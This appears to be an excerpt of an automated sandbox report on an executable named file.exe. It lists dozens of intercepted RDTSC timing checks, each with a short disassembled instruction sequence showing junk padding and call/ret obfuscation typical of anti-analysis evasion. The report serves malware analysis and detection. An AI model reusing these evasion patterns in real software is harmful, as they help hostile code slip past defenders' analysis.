                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D717B3 second address: D717BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F70ECA9AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71A8D second address: D71AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0F7085C5A0h 0x0000000e jne 00007F0F7085C596h 0x00000014 popad 0x00000015 je 00007F0F7085C5AEh 0x0000001b jmp 00007F0F7085C5A2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71AC7 second address: D71ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71C11 second address: D71C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74AE2 second address: D74B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xor dword ptr [esp], 7F8F097Bh 0x0000000c mov dword ptr [ebp+122D27F5h], ebx 0x00000012 push 00000003h 0x00000014 jmp 00007F0F70ECA9AEh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0F70ECA9A8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D27F5h], ebx 0x0000003b mov edx, dword ptr [ebp+122D2E13h] 0x00000041 push 00000003h 0x00000043 call 00007F0F70ECA9A9h 0x00000048 pushad 0x00000049 pushad 0x0000004a js 00007F0F70ECA9A6h 0x00000050 jmp 00007F0F70ECA9AAh 0x00000055 popad 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 jmp 00007F0F70ECA9AFh 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F0F70ECA9B0h 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B7F second address: D74B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B83 second address: D74B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74B92 second address: D74BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F0F7085C5A7h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c jbe 00007F0F7085C59Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C5C second address: D74C9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor ecx, 5856DB62h 0x00000010 push 00000000h 0x00000012 jg 00007F0F70ECA9BEh 0x00000018 call 00007F0F70ECA9A9h 0x0000001d js 00007F0F70ECA9B4h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74C9F second address: D74CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CA3 second address: D74CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0F70ECA9ACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CB8 second address: D74CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CBE second address: D74CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74CC2 second address: D74CF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c je 00007F0F7085C5B7h 0x00000012 pushad 0x00000013 jmp 00007F0F7085C5A9h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74DBB second address: D74E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 43BEF500h 0x0000000d js 00007F0F70ECA9ACh 0x00000013 lea ebx, dword ptr [ebp+12446983h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0F70ECA9A8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov cl, dh 0x00000035 mov esi, dword ptr [ebp+122D2B57h] 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007F0F70ECA9B8h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74E8E second address: D74E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74E92 second address: D74EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0F70ECA9A6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EA0 second address: D74EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EA4 second address: D74EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0F70ECA9A8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, esi 0x00000028 push 9685DED1h 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EDA second address: D74EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74EDE second address: D74F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0F70ECA9B5h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 697A21AFh 0x00000017 movzx ecx, ax 0x0000001a mov dword ptr [ebp+122D2E9Ah], edx 0x00000020 push 00000003h 0x00000022 mov edi, dword ptr [ebp+122D2B03h] 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D2BA7h] 0x00000030 or dword ptr [ebp+122D2D47h], esi 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1806h], edi 0x0000003e call 00007F0F70ECA9A9h 0x00000043 push edx 0x00000044 jmp 00007F0F70ECA9B7h 0x00000049 pop edx 0x0000004a push eax 0x0000004b jp 00007F0F70ECA9AEh 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F67 second address: D74F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F6B second address: D74F71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F71 second address: D74F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F7085C596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F7C second address: D74F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jbe 00007F0F70ECA9A6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74F94 second address: D74FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F0F7085C596h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D74FB8 second address: D7500E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F70ECA9A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0F70ECA9B3h 0x0000000f popad 0x00000010 pop eax 0x00000011 lea ebx, dword ptr [ebp+1244698Eh] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F0F70ECA9A8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 xor cx, B06Dh 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a jno 00007F0F70ECA9A6h 0x00000040 pop ebx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7500E second address: D75014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75014 second address: D75018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93B37 second address: D93B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0F7085C5BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0F7085C59Bh 0x00000012 jmp 00007F0F7085C5A1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93B88 second address: D93BA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F70ECA9B8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93BA8 second address: D93BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91992 second address: D91996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91996 second address: D919BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F0F7085C59Dh 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AF7 second address: D91B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B15 second address: D91B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B38 second address: D91B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91DD5 second address: D91DFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0F7085C59Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 jmp 00007F0F7085C59Dh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91DFB second address: D91E0E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F70ECA9AEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D920A6 second address: D920B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0F7085C596h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D920B5 second address: D920E4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e jmp 00007F0F70ECA9B0h 0x00000013 jg 00007F0F70ECA9AEh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92381 second address: D92385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924B7 second address: D924D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924D4 second address: D924D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924D9 second address: D924ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0F70ECA9AAh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D924ED second address: D924F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60907 second address: D6093B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0F70ECA9ACh 0x0000000c jbe 00007F0F70ECA9BCh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0F70ECA9B4h 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6093B second address: D60941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D60941 second address: D60945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93405 second address: D93415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C59Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93544 second address: D93554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F0F70ECA9A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D936F2 second address: D936FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D936FB second address: D93704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93704 second address: D9371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9371F second address: D93723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98124 second address: D9812A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9889C second address: D988A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDC8 second address: D5EDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0F7085C596h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5EDD3 second address: D5EDF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F70ECA9ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F70ECA9B2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690E8 second address: D690EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690EC second address: D690F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690F4 second address: D690FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D690FC second address: D6910F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F70ECA9ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6910F second address: D69115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69115 second address: D69126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69126 second address: D69134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0F7085C596h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D63B second address: D9D63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D79A second address: D9D7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F7085C596h 0x0000000a pushad 0x0000000b jmp 00007F0F7085C5A4h 0x00000010 jmp 00007F0F7085C5A1h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DD7F second address: D9DD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0F70ECA9B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E026 second address: D9E030 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F7085C596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E030 second address: D9E045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F70ECA9AFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E045 second address: D9E04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E04B second address: D9E04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E04F second address: D9E061 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F7085C596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F0F7085C5ABh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C5B second address: DA0C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C5F second address: DA0C7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F7085C596h 0x00000008 jmp 00007F0F7085C5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0C7F second address: DA0C84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1678 second address: DA169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F7085C5A3h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e ja 00007F0F7085C596h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA169C second address: DA16A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA16A4 second address: DA16AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F81 second address: DA1F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F85 second address: DA1F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F8B second address: DA1F90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2427 second address: DA243D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F7085C5A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA24C4 second address: DA2522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F0F70ECA9ABh 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0F70ECA9A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov esi, dword ptr [ebp+122D18D5h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F0F70ECA9B8h 0x00000041 rdtsc
